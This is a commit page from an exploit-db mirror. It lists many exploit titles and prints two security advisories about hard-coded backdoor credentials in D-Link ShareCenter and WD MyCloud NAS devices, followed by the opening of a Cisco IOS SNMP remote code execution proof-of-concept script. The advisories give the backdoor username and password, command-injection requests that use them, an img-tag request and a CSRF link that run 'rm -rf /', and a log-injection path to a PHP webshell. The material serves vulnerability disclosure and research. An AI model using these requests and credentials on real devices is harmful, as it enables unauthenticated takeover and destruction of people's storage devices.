bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-01-06

Browse source 
23 changes to exploits/shellcodes

Emulive Server4 7560 - Remote Denial of Service
Emulive Server4 Build 7560 - Remote Denial of Service

ShareCenter D-Link DNS-320 - Remote reboot/shutdown/reset (Denial of Service)
D-Link DNS-320 ShareCenter - Remote Reboot/Shutdown/Reset (Denial of Service)

DNS4Me 3.0 - Denial of Service / Cross-Site Scripting

EmuLive Server4 - Authentication Bypass / Denial of Service
GetGo Download Manager 5.3.0.2712 - 'Proxy' Buffer Overflow
Microsoft Windows win32k - Using SetClassLong to Switch Between CS_CLASSDC and CS_OWNDC Corrupts DC Cache

VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)
keene digital media server 1.0.2 - Directory Traversal variant
Xedus Web Server 1.0 - test.x 'Username' Cross-Site Scripting
Xedus Web Server 1.0 - testgetrequest.x 'Username' Cross-Site Scripting
Xedus Web Server 1.0 - Traversal Arbitrary File Access
Keene Digital Media Server 1.0.2 - Directory Traversal
Xedus Web Server 1.0 - test.x 'Username' Cross-Site Scripting
Xedus Web Server 1.0 - testgetrequest.x 'Username' Cross-Site Scripting
Xedus Web Server 1.0 - Traversal Arbitrary File Access
D-Link DNS-320 ShareCenter < 1.06 - Backdoor Access
WDMyCloud < 2.30.165 - Multiple Vulnerabilities
Ayukov NFTP FTP Client 2.0 - Buffer Overflow (Metasploit)
Cisco IOS - Remote Code Execution

Simple Machines Forum (SMF) 1.0.4 - 'modify' SQL Injection

WordPress 1.5.1.2 - xmlrpc Interface SQL Injection
WordPress 1.5.1.2 - 'xmlrpc' Interface SQL Injection

MySQL Eventum 1.5.5 - 'login.php' SQL Injection

PHP live helper 2.0.1 - Multiple Vulnerabilities
PHP Live Helper 2.0.1 - Multiple Vulnerabilities

Zen Cart 1.3.9f (typefilter) - Local File Inclusion
Zen Cart 1.3.9f - 'typefilter' Local File Inclusion

phpWebSite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting
phpWebSite 0.7.3/0.8.x/0.9.x Comment Module - 'CM_pid' Cross-Site Scripting

YaBB 1.x/9.1.2000 - YaBB.pl IMSend Cross-Site Scripting
YaBB 1.x/9.1.2000 - 'YaBB.pl IMSend' Cross-Site Scripting
SugarCRM 1.x/2.0 Module - 'record' SQL Injection
SugarCRM 1.x/2.0 Module - Traversal Arbitrary File Access
SugarCRM 1.x/2.0 Module - 'record' SQL Injection
SugarCRM 1.x/2.0 Module - Traversal Arbitrary File Access
phpGroupWare 0.9.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' Cross-Site Scripting
phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' SQL Injection
phpGroupWare 0.9.x - 'index.php' Multiple SQL Injections
phpGroupWare 0.9.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' Cross-Site Scripting
phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' SQL Injection
phpGroupWare 0.9.x - 'index.php' Multiple SQL Injections
Kayako eSupport 2.x - 'index.php' Knowledgebase Cross-Site Scripting
Kayako eSupport 2.x - Ticket System Multiple SQL Injections
Kayako eSupport 2.x - 'index.php' Knowledgebase Cross-Site Scripting
Kayako eSupport 2.x - Ticket System Multiple SQL Injections

Kayako ESupport 2.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities

Double Choco Latte 0.9.3/0.9.4 - 'main.php' Arbitrary PHP Code Execution

PHPCOIN 1.2 - 'auxpage.php?page' Traversal Arbitrary File Access
phpCoin 1.2 - 'auxpage.php?page' Traversal Arbitrary File Access
ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion
ModernGigabyte ModernBill 4.3 - 'C_CODE' Cross-Site Scripting
ModernGigabyte ModernBill 4.3 - 'Aid' Cross-Site Scripting
ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion
ModernGigabyte ModernBill 4.3 - 'C_CODE' Cross-Site Scripting
ModernGigabyte ModernBill 4.3 - 'Aid' Cross-Site Scripting
Yappa-ng 1.x/2.x - Remote File Inclusion
Yappa-ng 1.x/2.x - Cross-Site Scripting
Yappa-ng 1.x/2.x - Remote File Inclusion
Yappa-ng 1.x/2.x - Cross-Site Scripting

Notes Module for phpBB - SQL Injection
phpBB Notes Module - SQL Injection
osTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities
SitePanel2 2.6.1 - Multiple Input Validation Vulnerabilities
osTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities
SitePanel2 2.6.1 - Multiple Input Validation Vulnerabilities

Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities
HelpCenter Live! 1.0/1.2.x - Multiple Input Validation Vulnerabilities

FusionBB 0.x - Multiple Input Validation Vulnerabilities
Invision Power Services Invision Gallery 1.0.1/1.3 - SQL Injection
Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities
Invision Power Services Invision Gallery 1.0.1/1.3 - SQL Injection
Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities

osCommerce 2.1/2.2 - Multiple HTTP Response Splitting Vulnerabilities

PAFaq - Question Cross-Site Scripting

PAFaq - Administrator 'Username' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'download.php?Number' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple SQL Injections
UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php?Number' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php?message' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php?main' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php?Number' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php?posted' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'download.php?Number' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple SQL Injections
UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php?Number' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php?message' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php?main' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php?Number' SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php?posted' SQL Injection
Kayako LiveResponse 2.0 - 'index.php?Username' Cross-Site Scripting
Kayako LiveResponse 2.0 - 'index.php' Calendar Feature Multiple SQL Injections
Kayako Live Response 2.0 - 'index.php?Username' Cross-Site Scripting
Kayako Live Response 2.0 - 'index.php' Calendar Feature Multiple SQL Injections
MySQL AB Eventum 1.x - 'view.php?id' Cross-Site Scripting
MySQL AB Eventum 1.x - 'list.php?release' Cross-Site Scripting
MySQL AB Eventum 1.x - 'get_jsrs_data.php?F' Cross-Site Scripting
MySQL AB Eventum 1.x - 'view.php?id' Cross-Site Scripting
MySQL AB Eventum 1.x - 'list.php?release' Cross-Site Scripting
MySQL AB Eventum 1.x - 'get_jsrs_data.php?F' Cross-Site Scripting

RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection

EyeOS 0.8.x - Session Remote Command Execution
eyeOS 0.8.x - Session Remote Command Execution

CPAINT 1.3/2.0 - 'TYPE.php' Cross-Site Scripting
CPAINT 1.3/2.0.2 - 'TYPE.php' Cross-Site Scripting

XMB Forum 1.8/1.9 - 'u2u.php?Username' Cross-Site Scripting

Zen Cart Web Shopping Cart 1.x - 'autoload_func.php?autoLoadConfig[999][0][loadFile]' Remote File Inclusion
Zen Cart Web Shopping Cart 1.3.0.2 - 'autoload_func.php?autoLoadConfig[999][0][loadFile]' Remote File Inclusion

osCommerce 2.1/2.2 - 'product_info.php' SQL Injection

CakePHP 1.1.7.3363 - 'Vendors.php' Directory Traversal

HAMweather 3.9.8 - 'template.php' Script Code Injection

Kayako SupportSuite 3.0.32 - PHP_SELF Trigger_Error Function Cross-Site Scripting
Kayako SupportSuite 3.0.32 - 'PHP_SELF Trigger_Error' Function Cross-Site Scripting

Jamroom 3.3.8 - Cookie Authentication Bypass
Kayako SupportSuite 3.x - '/visitor/index.php?sessionid' Cross-Site Scripting
Kayako SupportSuite 3.x - 'index.php?filter' Cross-Site Scripting
Kayako SupportSuite 3.x - '/staff/index.php?customfieldlinkid' SQL Injection
Kayako SupportSuite 3.x - '/visitor/index.php?sessionid' Cross-Site Scripting
Kayako SupportSuite 3.x - 'index.php?filter' Cross-Site Scripting
Kayako SupportSuite 3.x - '/staff/index.php?customfieldlinkid' SQL Injection

Vanilla 1.1.4 - HTML Injection / Cross-Site Scripting

UBBCentral UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection
gps-server.net GPS Tracking Software < 3.1 - Multiple Vulnerabilities
Zen Cart < 1.3.8a - SQL Injection
PHP Topsites < 2.2 - Multiple Vulnerabilities
phpLinks < 2.1.2 - Multiple Vulnerabilities
P-Synch < 6.2.5 - Multiple Vulnerabilities
WinMX < 2.6 - Design Error
FTP Service < 1.2 - Multiple Vulnerabilities
MegaBrowser < 0.71b - Multiple Vulnerabilities
Max Web Portal < 1.30 - Multiple Vulnerabilities
Snitz Forums 2000 < 3.4.0.3 - Multiple Vulnerabilities
Gespage 7.4.8 - SQL Injection

Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)
This commit is contained in:
Offensive Security 2018-01-06 05:02:14 +00:00
parent b768a6ef6c
commit 3d73ec60b6
25 changed files with 2308 additions and 74 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

214
exploits/hardware/remote/43434.txt Normal file
View file

@ -0,0 +1,214 @@
DNS-320L ShareCenter Backdoor
Vendor: D-Link
Product: DNS-320L ShareCenter
Version: < 1.06
Website: http://www.dlink.com/uk/en/products/dns-320l-sharecenter-2-bay-cloud-storage-enclosure
###########################################################################
______ ____________ __
/ ____/_ __/ / __/_ __/__ _____/ /_
/ / __/ / / / / /_ / / / _ \/ ___/ __ \
/ /_/ / /_/ / / __/ / / / __/ /__/ / / /
\____/\__,_/_/_/ /_/ \___/\___/_/ /_/
GulfTech Research and Development
###########################################################################
# D-Link DNS-320L ShareCenter Backdoor #
###########################################################################
Released Date: 2018-01-03
Last Modified: 2017-06-14
Company Info: D-Link
Version Info:
Vulnerable
D-Link DNS-320L ShareCenter < 1.06
Possibly various other ShareCenter devices
Not Vulnerable
D-Link DNS-320L ShareCenter >= 1.06
--[ Table of contents
00 - Introduction
00.1 Background
01 - Hard coded backdoor
01.1 - Vulnerable code analysis
01.2 - Remote exploitation
02 - Credit
03 - Proof of concept
04 - Solution
05 - Contact information
--[ 00 - Introduction
The purpose of this article is to detail the research that GulfTech has
recently completed regarding the D-Link DNS 320L ShareCenter.
--[ 00.1 - Background
D-Link Share Center 2-Bay Cloud Storage 2000 (DNS-320L) aims to be a
solution to share, stream, manage and back up all of your digital files by
creating your own personal Cloud.
--[ 01 - Hard coded backdoor
While doing some research on another device, I came across a hard coded
backdoor within one of the CGI binaries. Several different factors such as
similar file structure and naming schemas led me to believe that the code
that was in the other device was also shared with the DNS-320L ShareCenter.
As it turned out our hunch was correct. An advisory regarding the other
vulnerable device in question will be released in the future, as the vendor
for that device is still in the process of addressing the issues.
Now, let's take a moment to focus on the following file which is a standard
Linux ELF executable and pretty easy to go through.
/usr/local/modules/cgi/nas_sharing.cgi
The above file can be accessed by visiting "/cgi-bin/nas_sharing.cgi" and
contains the following function that is used to authenticate the user.
--[ 01.1 - Vulnerable code analysis
Below is the psuedocode created from the disassembly of the binary. I have
renamed the function to "re_BACKDOOR" to visually identify it more easily.
struct passwd *__fastcall re_BACKDOOR(const char *a1, const char *a2)
{
const char *v2; // r5@1
const char *v3; // r4@1
struct passwd *result; // r0@4
FILE *v5; // r6@5
struct passwd *v6; // r5@7
const char *v7; // r0@9
size_t v8; // r0@10
int v9; // [sp+0h] [bp-1090h]@1
char s; // [sp+1000h] [bp-90h]@1
char dest; // [sp+1040h] [bp-50h]@1
v2 = a2;
v3 = a1;
memset(&s, 0, 0x40u);
memset(&dest, 0, 0x40u);
memset(&v9, 0, 0x1000u);
if ( *v2 )
{
v8 = strlen(v2);
_b64_pton(v2, (u_char *)&v9, v8);
if ( dword_2C2E4 )
{
sub_1194C((const char *)&unk_1B1A4, v2);
sub_1194C("pwd decode[%s]\n", &v9);
}
}
if (!strcmp(v3, "mydlinkBRionyg")
&& !strcmp((const char *)&v9, "abc12345cba") )
{
result = (struct passwd *)1;
}
else
{
v5 = (FILE *)fopen64("/etc/shadow", "r");
while ( 1 )
{
result = fgetpwent(v5);
v6 = result;
if ( !result )
break;
if ( !strcmp(result->pw_name, v3) )
{
strcpy(&s, v6->pw_passwd);
fclose(v5);
strcpy(&dest, (const char *)&v9);
v7 = (const char *)sub_1603C(&dest, &s);
return (struct passwd *)(strcmp(v7, &s) == 0);
}
}
}
return result;
}
As you can see in the above code, the login functionality specifically
looks for an admin user named "mydlinkBRionyg" and will accept the password
of "abc12345cba" if found. This is a classic backdoor. Simply login with
the credentials that were just mentioned from the above code.
--[ 01.2 - Remote exploitation
Exploiting this backdoor is fairly trivial, but I wanted a root shell, not
just admin access with the possibility of shell access. So, I started
looking at the functionality of this file and noticed the method referenced
when the "cmd" parameter was set to "15". This particular method happened
to contain a command injection issue. Now I could turn this hard coded
backdoor into a root shell, and gain control of the affected device.
However, our command injection does not play well with spaces, or special
characters such as "$IFS", so I got around this by just playing ping pong
with pipes, and syslog() in order to create a PHP shell. These are the
steps that I took to achieve this.
STEP01: We send a logout request to /cgi-bin/login_mgr.cgi?cmd=logout with
the "name" parameter value set to that of our malicious PHP wrapper code
within our POST data. This "name" parameter is never sanitized.
name=
At this point we have successfully injected our payload into the user logs,
as the name of the user who logouts is written straight to the user logs. A
user does not have to be logged in, in order to logout and inject data.
STEP02: We now use cat to readin the user log file and pipe it out to the
web directory in order to create our PHP web shell.
GET /cgi-bin/nas_sharing.cgi?dbg=1&cmd=15&user=mydlinkBRionyg&passwd=YWJjMT
IzNDVjYmE&system=cat/var/www/shell.php HTTP/1.1
At this point an attacker can now simply visit the newly created web shell
and execute any PHP code that they choose, as root.
http://sharecenterhostname/shell.php?01100111=phpinfo();
By sending a request like the one above a remote attacker would cause the
phpinfo() function to be displayed, thus demonstrating successful remote
exploitation as root.
--[ 02 - Credit
James Bercegay
GulfTech Research and Development
--[ 03 - Proof of concept
We strive to do our part to contribute to the security community.
Metasploit modules for issues outlined in this paper can be found online.
--[ 04 - Solution
Upgrade to firmware version 1.06 or later. See the official vendor website
for further details.
--[ 05 - Contact information
Web
https://gulftech.org
Mail
security@gulftech.org
Copyright 2018 GulfTech Research and Development. All rights reserved.

506
exploits/hardware/remote/43435.txt Normal file
View file

@ -0,0 +1,506 @@
WDMyCloud Multiple Vulnerabilities
Vendor: Western Digital
Product: WDMyCloud
Version: <= 2.30.165
Website: https://www.wdc.com/products/network-attached-storage.html
###########################################################################
______ ____________ __
/ ____/_ __/ / __/_ __/__ _____/ /_
/ / __/ / / / / /_ / / / _ \/ ___/ __ \
/ /_/ / /_/ / / __/ / / / __/ /__/ / / /
\____/\__,_/_/_/ /_/ \___/\___/_/ /_/
GulfTech Research and Development
###########################################################################
# WDMyCloud <= 2.30.165 Multiple Vulnerabilities #
###########################################################################
Released Date: 2018-01-04
Last Modified: 2017-06-11
Company Info: Western Digital
Version Info:
Vulnerable
MyCloud <= 2.30.165
MyCloudMirror <= 2.30.165
My Cloud Gen 2
My Cloud PR2100
My Cloud PR4100
My Cloud EX2 Ultra
My Cloud EX2
My Cloud EX4
My Cloud EX2100
My Cloud EX4100
My Cloud DL2100
My Cloud DL4100
Not Vulnerable
MyCloud 04.X Series
--[ Table of contents
00 - Introduction
00.1 Background
01 - Unrestricted file upload
01.1 - Vulnerable code analysis
01.2 - Remote exploitation
02 - Hard coded backdoor
02.1 - Vulnerable code analysis
02.2 - Remote exploitation
03 - Miscellaneous security issues
03.1 - Cross site request forgery
03.2 - Command injection
03.3 - Denial of service
03.4 - Information disclosure
04 - Reused Code
05 - Credit
06 - Proof of concept
07 - Disclosure timeline
08 - Solution
09 - Contact information
10 - References
--[ 00 - Introduction
The purpose of this article is to detail the research that I have completed
regarding the Western Digital MyCloud family of devices.
Several serious security issues were uncovered during my research.
Vulnerabilities such as pre auth remote root code execution, as well as a
hardcoded backdoor admin account which can NOT be changed. The backdoor
also allows for pre auth remote root code execution on the affected device.
The research was conducted on both a WDMyCloud 4TB and a WDMyCloudMirror
16TB with the latest available firmware 2.30.165. My research shows that
the 04 branch of the WDMyCloud firmware is not vulnerable to these issues.
--[ 00.1 - Background
WD My Cloud is a personal cloud storage unit to organize your photos and
videos. It is currently the best selling NAS (network attached storage)
device listed on the amazon.com website, and is used by individuals and
businesses alike. It's purpose is to host your files, and it also has the
ability to sync them with various cloud and web based services.
--[ 01 - Unrestricted file upload
The WDMyCloud device is vulnerable to an unrestricted file upload
vulnerability within the following file:
/usr/local/modules/web/pages/jquery/uploader/multi_uploadify.php
The root of the problem here is due to the misuse and misunderstanding of
the PHP gethostbyaddr() function used within PHP, by the developer of this
particular piece of code. From the PHP manual this functions return values
are defined as the following for gethostbyaddr():
"Returns the host name on success, the unmodified ip_address on failure, or
FALSE on malformed input."
With a brief overview of the problem, let's have a look at the offending
code in order to get a better understanding of what is going on with this
particular vulnerability.
--[ 01.1 - Vulnerable code analysis
Below is the code from the vulnerable "multi_uploadify.php" script. You can
see that I have annoted the code to explain what is happening.
#BUG 01: Here the attacker controlled "Host" header is used to define the
remote auth server. This is by itself really bad, as an attacker could
easily just specify that the host be the IP address of a server that they
are in control of. But, if we send it an invalid "Host" header it will just
simply return FALSE as defined in the PHP manual.
$ip = gethostbyaddr($_SERVER['HTTP_HOST']);
$name = $_REQUEST['name'];
$pwd = $_REQUEST['pwd'];
$redirect_uri = $_REQUEST['redirect_uri'];
//echo $name ."
".$pwd."
".$ip;
#BUG 02: At this point, this request should always fail. The $result
variable should now be set to FALSE.
$result = @stripslashes( @join( @file( "http://".$ip."/mydlink/mydlink.cgi?
cmd=1&name=".$name."=&pwd=".$pwd ),"" ));
#BUG 03: Here an empty haystack is searched, and thus strstr() returns a
value of FALSE.
$result_1 = strstr($result,"0");
$result_1 = substr ($result_1, 0,28);
#BUG 04: The strncmp() call here is a strange one. It looks for a specific
login failure. So, it never accounts for when things go wrong or slightly
unexpected. As a result this "if" statement will always be skipped.
if (strncmp ($result_1,"0",28) == 0 )
//if (strstr($result,"0")== 0 )
{
header("HTTP/1.1 302 Found");
header("Location: ".$redirect_uri."?status=0");
exit();
}
#BUG 05: At this point all checks have been passed, and an attacker can use
this issue to upload any file to the server that they want.
The rest of the source code was omitted for the sake of breivity, but it
just handles the file upload logic once the user passes the authentication
checks.
--[ 01.2 - Remote exploitation
Exploiting this issue to gain a remote shell as root is a rather trivial
process. All an attacker has to do is send a post request that contains a
file to upload using the parameter "Filedata[0]", a location for the file
to be upload to which is specified within the "folder" parameter, and of
course a bogus "Host" header.
I have written a Metasploit module to exploit this issue. The module will
use this vulnerability to upload a PHP webshell to the "/var/www/"
directory. Once uploaded, the webshell can be executed by requesting a URI
pointing to the backdoor, and thus triggering the payload.
--[ 02 - Hard coded backdoor
After finding the previously mentioned file upload vulnerability I decided
to switch gears and start reversing the CGI binaries that were accessable
via the web interface. The CGI binaries are standard Linux ELF executables
and pretty easy to go through. Within an hour of starting I stumbled
across the following file located at:
/usr/local/modules/cgi/nas_sharing.cgi
The above file can be accessed by visiting "/cgi-bin/nas_sharing.cgi" but
it produces server errors with every single method, except when the "cmd"
parameter was set to "7". This piqued my interest and so I really started
digging into the binary, as it seemed very buggy and possibly vulnerable.
As it turns out the error was caused due to buggy code and nothing I was or
wasn't doing wrong. But, while I was figuring out the cause of the error I
happened to come across the following function that is used to authenticate
the remote user.
--[ 02.1 - Vulnerable code analysis
Below is the psuedocode created from the disassembly of the binary. I have
renamed the function to "re_BACKDOOR" to visually identify it more easily.
struct passwd *__fastcall re_BACKDOOR(const char *a1, const char *a2)
{
const char *v2; // r5@1
const char *v3; // r4@1
struct passwd *result; // r0@4
FILE *v5; // r6@5
struct passwd *v6; // r5@7
const char *v7; // r0@9
size_t v8; // r0@10
int v9; // [sp+0h] [bp-1090h]@1
char s; // [sp+1000h] [bp-90h]@1
char dest; // [sp+1040h] [bp-50h]@1
v2 = a2;
v3 = a1;
memset(&s, 0, 0x40u);
memset(&dest, 0, 0x40u);
memset(&v9, 0, 0x1000u);
if ( *v2 )
{
v8 = strlen(v2);
_b64_pton(v2, (u_char *)&v9, v8);
if ( dword_2C2E4 )
{
sub_1194C((const char *)&unk_1B1A4, v2);
sub_1194C("pwd decode[%s]\n", &v9);
}
}
if (!strcmp(v3, "mydlinkBRionyg")
&& !strcmp((const char *)&v9, "abc12345cba") )
{
result = (struct passwd *)1;
}
else
{
v5 = (FILE *)fopen64("/etc/shadow", "r");
while ( 1 )
{
result = fgetpwent(v5);
v6 = result;
if ( !result )
break;
if ( !strcmp(result->pw_name, v3) )
{
strcpy(&s, v6->pw_passwd);
fclose(v5);
strcpy(&dest, (const char *)&v9);
v7 = (const char *)sub_1603C(&dest, &s);
return (struct passwd *)(strcmp(v7, &s) == 0);
}
}
}
return result;
}
As you can see in the above code, the login functionality specifically
looks for an admin user named "mydlinkBRionyg" and will accept the password
of "abc12345cba" if found. This is a classic backdoor. Simply login with
the credentials that I just mentioned from the above code.
Also, it is peculiar that the username is "mydlinkBRionyg", and that the
vulnerability in Section 1 of this paper refers to a non existent file name
of "mydlink.cgi" but, more about that later in section 4...
--[ 02.2 - Remote exploitation
At first, to the untrained eye, exploiting this backdoor to do useful
things may seem problematic due to the fact that only method "7" gives us
no error. And, method 7 only allows us the ability to download any files in
"/mnt/", but no root shell. But, we want a root shell. Right?
After digging deeper I realized that the CGI script was dying every time,
but only at the final rendering phase due to what seems like an error where
the programmer forgot to specify the content type header on output, thus
confusing the webserver and causing the crash. So, everything we do gets
executed up until that point successfully. It is just blind execution.
Now that I had that figured out I started looking for a method I could then
exploit to gain shell access. I started with method "51" because it was the
first one I looked at. This particular method happened to contain a command
injection issue. Now I easily could turn this backdoor into a root
shell, and gain control of the affected device.
GET /cgi-bin/nas_sharing.cgi?dbg=1&cmd=51&user=mydlinkBRionyg&passwd=YWJjMT
IzNDVjYmE&start=1&count=1;touch+/tmp/gulftech; HTTP/1.1
By sending a request like the one above a remote attacker could now execute
any commands as root. And yes, the password is base64 encoded, as that is
what the script expects. In the example above I simply create a file called
"gulftech" located in the "/tmp/" directory.
The triviality of exploiting this issues makes it very dangerous, and even
wormable. Not only that, but users locked to a LAN are not safe either. An
attacker could literally take over your WDMyCloud by just having you visit
a website where an embedded iframe or img tag make a request to the
vulnerable device using one of the many predictable default hostnames for
the WDMyCloud such as "wdmycloud" and "wdmycloudmirror" etc.
<img src="http://wdmycloud/cgi-bin/nas_sharing.cgi?dbg=1&cmd=51&user=mydlin
kBRionyg&passwd=YWJjMTIzNDVjYmE&start=1&count=1;rm+-rf+/;">
For example simply visiting the above link will totally destroy a WDMyCloud
without the need for any type of authentication whatsoever, and there is
nothing you can do about it except delete the file as the credentials are
hardcoded into the binary itself.
--[ 03 - Miscellaneous vulnerabilities
In addition to the two previously mentioned critical vulnerabilities were
also several other issues. These other issues are still very dangerous, but
require authentication in some cases, and for the most part are not
considered as critical, and also require less technical explanation.
--[ 03.1 - Cross site request forgery
There is no real XSRF protection within the WDMyCloud web interface. This
can have quite the impact on unsuspecting users. Exploitation of this issue
is trivial.
http://wdmycloud/web/dsdk/DsdkProxy.php?;rm -rf /;
For example, if a logged in WDMyCloud admin visits, or is forced to visit
the above link, then the entire device will be wiped out. This is just one
of many XSRF issues. We do not have time to track them all down.
--[ 03.2 - Command injection
Some time ago, a researcher from the "Exploiteers" team found an alarming
number of command injection issues within the WDMyCloud. Unfortunately, we
were able to find quite a few as well.
class RemoteBackupsAPI{
public function getRecoverItems()
{
$xmlPath = "/var/www/xml/rsync_recover_items.xml";
$jobName = $_REQUEST['jobName'];
@unlink($xmlPath);
$cmd = "rsyncmd -l \"$xmlPath\" -r \"$jobName\" >/dev/null";
system($cmd);
if (file_exists($xmlPath))
{
print file_get_contents($xmlPath);
}
else
{
print "";
}
}
}
The above code is an example of the type of command injection issues that
still plague the WDMyCloud. This particular command injection is post auth,
as were all of the other command injections I found too. However, I did not
have time to sift through looking for all of these. And by now I feel
that the manufacturer should know better considering they just went through
the process of patching many command injection vulnerabilities disclosed by
the Exploiteers.[1]
--[ 03.3 - Denial of service
It is possible for an attacker to abuse language preferences functionality
in order to cause a DoS to the web interface. This is due to the fact that
any unauthenticated user can set the global language preferences for the
entire device and all of its users. The psuedocode from the disassembled
binary can be seen below.
int cgi_language()
{
int v1; // [sp+0h] [bp-10h]@1
cgiFormString("f_language", &v1, 8);
xml_set_str((int)"/language", (int)&v1);
xml_write_file("/etc/NAS_CFG/config.xml");
LIB_CP_Config_To_MTD(1);
cgiHeaderContentType("text/html");
return system("language.sh > /dev/null 2>&1 &");
}
This is not a very useful attack vector since we only have 8 bytes to work
with. But, you can make a script that keeps randomly resetting the language
to some random language and it will affect all users of the device and
requires no authentication. It is very hard to use the device if it is
rendering all of the pages in a language you can not understand.
http://wdmycloud/cgi-bin/login_mgr.cgi?cmd=cgi_language&f_language=7
The above example request sets the language to korean. There are 17
available language codes. Details can be found in language.sh located on
the target device.
--[ 03.4 - Information disclosure
It is possible for an attacker to dump a list of all users, including
detailed user information.
GET /api/2.1/rest/users? HTTP/1.1
Making a simple request to the webserver like the one above will dump the
user information to an attacker for all users. This does not require any
authentication in order to take advantage of.
--[ 04 - D-Link DNS-320L ShareCenter
As I have mentioned earlier in this article, I found it peculiar that
the username used for the backdoor is "mydlinkBRionyg", and that the
vulnerability in Section 1 of this paper refers to a non existent file name
of "mydlink.cgi". This really piqued my curiosity, and so I started using
google to try to track down some leads. After searching for the term of
"mydlink.cgi" I came across a reference to a post made by a D-Link user
regarding their D-Link DNS-320L ShareCenter NAS device.[2]
Within that post were references to file names and directory structure that
were fairly unique, and from the D-link device. But, they also perfectly
matched my WDMyCloud device. The more I looked into this the weirder it
seemed. So, I gained access to a D-Link DNS-320L ShareCenter. Once I had it
things became pretty clear to me as the D-Link DNS-320L had the same exact
hard coded backdoor and same exact file upload vulnerability that was
present within the WDMyCloud. So, it seems that the WDMyCloud software
shares a large amount of the D-Link DNS-320L code, backdoor and all. There
are also other undeniable examples such as misspelled function names and
other anomalies that match up within both the WDMyCloud and the D-Link
DNS-320L ShareCenter code.
It should be noted that unlike the WDMyCloud the D-Link DNS-320L is
currently NOT vulnerable to the backdoor and file upload issues, so you
should upgrade your DNS-320L firmware as soon as possible as the issues can
be leveraged to gain a remote root shell on the DNS-320L if you are not up
to date with your device firmware. The backdoor was first removed in the
1.0.6 firmware release. (July 28, 2014)
It is interesting to think about how before D-Link updated their software
two of the most popular NAS device families in the world, sold by two of
the most popular tech companies in the world were both vulnerable at the
same time, to the same backdoor for a while. The time frame in which both
devices were vulnerable at the same time in the wild was roughly from early
2014 to later in 2014 based on comparing firmware release note dates.
--[ 05 - Credit
James Bercegay
GulfTech Research and Development
--[ 06 - Proof of concept
We strive to do our part to contribute to the security community.
Metasploit modules for issues outlined in this paper can be found online.
--[ 07 - Disclosure timeline
2017-06-10
Contacted vendor via web contact form. Assigned case #061117-12088041.
2017-06-12
Support member Gavin referred us to WDC PSIRT. We immediately sent a PGP
encrypted copy of our report to WDC PSIRT.
2017-06-13
Recieved confirmation of report from Samuel Brown.
2017-06-16
A period of 90 days is requested by vendor until full disclosure.
2017-12-15
Zenofex posts disclosure of the upload bug independantly of my research [3]
2018-01-03
Public Disclosure
--[ 08 - Solution
N/A
--[ 09 - Contact information
Web
https://gulftech.org/
Mail
security@gulftech.org
--[ 10 - References
[1] https://blog.exploitee.rs/2017/hacking_wd_mycloud/
[2] http://forums.dlink.com/index.php?topic=65415.0
[3] https://www.exploitee.rs/index.php/Western_Digital_MyCloud
Copyright 2018 GulfTech Research and Development. All rights reserved.

167
exploits/hardware/remote/43450.py Executable file
View file

@ -0,0 +1,167 @@
#!/usr/bin/env python
if False: '''
CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution
===================
This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco Systems on June 29th 2017 - <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp>
Description
-------------
RCE exploit code is available for Cisco Integrated Service Router 2811. This exploit is firmware dependent. The latest firmware version is supported:
- Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
ROM Monitor version:
- System Bootstrap, Version 12.4(13r)T, RELEASE SOFTWARE (fc1)
Read-only community string is required to trigger the vulnerability.
Shellcode
------------
The exploit requires shellcode as HEX input. This repo contains an example shellcode for bypassing authentication in telnet service and in enable prompt. Shellcode to revert changes is also available. If you want to write your own shellcode feel free to do so. Just have two things in mind:
- Don't upset the watchdog by running your code for too long. Call a sleep function once in a while.
- Return execution flow back to SNMP service at the end. You can use last opcodes from the demo shellcode:
```
3c1fbfc4 lui $ra, 0xbfc4
37ff89a8 ori $ra, $ra, 0x89a8
03e00008 jr $ra
00000000 nop
```
Usage example
-------------
```
